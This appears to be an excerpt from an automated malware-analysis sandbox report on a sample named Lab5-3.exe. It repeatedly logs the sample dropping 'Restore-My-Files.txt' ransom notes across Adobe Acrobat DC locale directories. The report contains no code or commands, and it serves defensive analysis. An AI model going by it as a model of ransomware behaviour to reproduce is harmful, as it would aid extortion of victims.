                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
